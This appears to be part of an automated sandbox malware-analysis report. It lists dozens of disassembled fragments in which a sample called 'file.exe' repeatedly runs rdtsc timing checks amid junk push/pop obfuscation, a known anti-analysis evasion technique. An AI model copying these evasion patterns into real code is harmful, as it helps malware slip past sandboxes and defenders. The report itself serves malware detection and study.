                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB8DF second address: 13CB8E9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F65A450259Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC9EC second address: 13CC9F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CE653 second address: 13CE657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13CE7F6 second address: 13CE8A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F65A4C18F98h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D18FEh], ebx 0x0000002c mov dword ptr [ebp+122D3803h], edi 0x00000032 push dword ptr fs:[00000000h] 0x00000039 push ebx 0x0000003a mov bl, cl 0x0000003c pop edi 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007F65A4C18F98h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 0000001Ah 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e mov eax, dword ptr [ebp+122D0011h] 0x00000064 stc 0x00000065 push FFFFFFFFh 0x00000067 jmp 00007F65A4C18FA8h 0x0000006c push eax 0x0000006d pushad 0x0000006e pushad 0x0000006f pushad 0x00000070 popad 0x00000071 jng 00007F65A4C18F96h 0x00000077 popad 0x00000078 push eax 0x00000079 push edx 0x0000007a js 00007F65A4C18F96h 0x00000080 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13CF7F4 second address: 13CF7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D061D second address: 13D062F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13CF7FC second address: 13CF802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D062F second address: 13D0634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13CF802 second address: 13CF80F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13CF8B3 second address: 13CF8D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F65A4C18F98h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D1586 second address: 13D158A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D158A second address: 13D1590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D1590 second address: 13D15B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A45025A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F65A4502598h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D15B8 second address: 13D1639 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F65A4C18F98h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 add dword ptr [ebp+122DBA9Fh], ecx 0x00000029 jmp 00007F65A4C18F9Bh 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F65A4C18F98h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a push 00000000h 0x0000004c mov dword ptr [ebp+122D19FCh], ecx 0x00000052 xchg eax, esi 0x00000053 jmp 00007F65A4C18FA7h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D1639 second address: 13D163E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D34C5 second address: 13D34D7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D34D7 second address: 13D34DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D34DB second address: 13D34DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D34DF second address: 13D34E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D34E5 second address: 13D34EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D4543 second address: 13D454D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F65A4502596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D08C8 second address: 13D08CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D26DB second address: 13D26E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D37C4 second address: 13D37C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D37C9 second address: 13D37D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D37D6 second address: 13D37DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D765C second address: 13D7676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65A45025A6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D6785 second address: 13D678A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D678A second address: 13D681B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F65A4502598h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 or di, CC91h 0x00000029 mov dword ptr [ebp+1245602Dh], eax 0x0000002f push dword ptr fs:[00000000h] 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F65A4502598h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov ebx, esi 0x00000052 mov ebx, 291FF293h 0x00000057 mov dword ptr fs:[00000000h], esp 0x0000005e mov ebx, dword ptr [ebp+122D1905h] 0x00000064 mov eax, dword ptr [ebp+122D03B5h] 0x0000006a mov edi, 2C120181h 0x0000006f push FFFFFFFFh 0x00000071 mov ebx, dword ptr [ebp+122D358Ah] 0x00000077 nop 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D681B second address: 13D6821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D6821 second address: 13D6826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D7997 second address: 13D799B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D799B second address: 13D79AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F65A4502596h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D79AA second address: 13D79BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F65A4C18F9Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E1347 second address: 13E134D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E5700 second address: 13E5705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E5705 second address: 13E574E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A45025A9h 0x00000007 jmp 00007F65A45025A1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F65A45025A7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E574E second address: 13E5752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E5752 second address: 13E575A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E5F82 second address: 13E5F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E5F88 second address: 13E5F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E5F98 second address: 13E5F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E5F9E second address: 13E5FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E5FA3 second address: 13E5FA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E5FA9 second address: 13E5FBE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F65A4502596h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E5FBE second address: 13E5FD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E5FD5 second address: 13E5FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E5FDA second address: 13E5FEA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E6093 second address: 13E60A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E60A4 second address: 13E60AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13ECD8E second address: 13ECD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EC345 second address: 13EC36E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F65A4C18F96h 0x0000000d jmp 00007F65A4C18FA8h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EC36E second address: 13EC385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F65A450259Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EC385 second address: 13EC389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EC389 second address: 13EC38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EC38F second address: 13EC397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EC397 second address: 13EC39D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13ECBD1 second address: 13ECBF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F65A4C18F96h 0x0000000a jc 00007F65A4C18F96h 0x00000010 jmp 00007F65A4C18F9Fh 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13ECBF9 second address: 13ECC2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65A45025A5h 0x0000000e jmp 00007F65A45025A3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13ECC2A second address: 13ECC49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA5h 0x00000007 jg 00007F65A4C18F96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13ECC49 second address: 13ECC4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137FFEB second address: 137FFF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137FFF1 second address: 137FFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F125B second address: 13F125F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F13A5 second address: 13F13BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F65A450259Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F13BD second address: 13F13C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A6750 second address: 13A6761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F65A450259Ah 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F239D second address: 13F23A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F0C30 second address: 13F0C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F8B63 second address: 13F8B79 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65A4C18F9Ch 0x00000008 jg 00007F65A4C18F96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1381B6C second address: 1381B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65A450259Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F794A second address: 13F7950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F7950 second address: 13F7983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F65A45025A0h 0x0000000b jmp 00007F65A45025A8h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F7983 second address: 13F7989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F7989 second address: 13F798D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F7AEE second address: 13F7AFC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F7AFC second address: 13F7B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F65A4502596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F84E4 second address: 13F84F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F65A4C18F96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F84F0 second address: 13F8502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F65A450259Bh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FB6E4 second address: 13FB6EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FB6EA second address: 13FB6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FB6EE second address: 13FB716 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65A4C18F96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F65A4C18F9Dh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F65A4C18F9Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FB716 second address: 13FB732 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F65A4502596h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F65A45025A0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FB732 second address: 13FB738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BED72 second address: 13BED77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BEFDC second address: 13BEFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BEFE2 second address: 13BEFE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BF227 second address: 13BF22C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BF22C second address: 13BF232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BF949 second address: 13BF94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
